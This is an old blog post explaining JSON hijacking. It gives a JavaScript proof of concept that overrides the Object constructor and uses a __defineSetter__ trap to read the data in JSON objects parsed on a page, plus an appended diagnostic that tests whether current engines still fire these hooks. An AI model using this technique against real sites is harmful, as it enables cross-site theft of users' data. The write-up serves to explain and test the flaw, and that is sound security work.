JSON is not as safe as people think it is, part 2
Yesterday, I blogged about how to steal data from JSON by overriding the Array constructor. Today, we break into Objects too.
Mark Goodwin submitted a non-deprecated syntax that uses the __defineSetter__ feature, which was a good start (Aside: does anyone else think that's ugly?). Over iChat he also invented a setTimeout tweak, and I ported it over to Object.
So now you can steal data from any JSON object:
<script type="text/javascript">
var obj;
function Object() {
  obj = this;
  // define a setter for the killme property
  this.__defineSetter__('killme', function(x) {
    for (key in obj) {
      if (key != 'killme') {
        alert('Data stolen from array: ' + key + '=' + obj[key]);
      }
    }
  });
  // call the setter when the JSON parse is done
  setTimeout("obj['killme']=2;", 0);
}
</script>
<button onclick="({ 'data':'wibble' })">Hack</button>
It's still not going to work anywhere but Mozilla, but now that's only because the JavaScript interpreters in the other browsers are out of date.
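An added check, not part of the original post: it reports whether the engine it runs on fires either kind of hook (a replacement Object() constructor, or a setter) while an object is built from JSON text. Engines that follow ES5 or later should report that only the plain-assignment control fires. The names `SAMPLE`, `constructorHookFires` and `setterHookFires` are made up for this example, and the setter is placed on `Object.prototype` rather than on `this` so it can be tested without the constructor hook.

```javascript
// Added example, not from the original post. SAMPLE is constructed input.
const SAMPLE = '{"data":"wibble"}';

// Hook 1: a replacement Object() constructor, declared in a scratch scope
// so the real Object stays intact for the rest of the program.
function constructorHookFires() {
  const probe = new Function(
    'var fired = false;' +
    'function Object() { fired = true; }' +
    'var parsed = (' + SAMPLE + ');' +
    'return [fired, parsed.data];'
  );
  const [fired, value] = probe();
  return { fired, value };
}

// Hook 2: a setter trap for the key that appears in the JSON text.
// Records which way of building the object (if any) runs the setter.
function setterHookFires() {
  const seen = { jsonParse: false, literal: false, assignment: false };
  let current = null;
  Object.defineProperty(Object.prototype, 'data', {
    configurable: true,
    set(value) { seen[current] = true; }
  });
  try {
    current = 'jsonParse';
    JSON.parse(SAMPLE);              // defines own properties, no setter call
    current = 'literal';
    (0, eval)('(' + SAMPLE + ')');   // JSON text evaluated as script
    current = 'assignment';          // control: proves the trap is armed
    const o = {};
    o.data = 'wibble';
  } finally {
    delete Object.prototype.data;    // always remove the trap again
  }
  return seen;
}

console.log('constructor hook:', constructorHookFires());
console.log('setter hook:', setterHookFires());
```

If `fired`, `jsonParse` or `literal` comes back true, that runtime still lets page script observe JSON data as it is constructed.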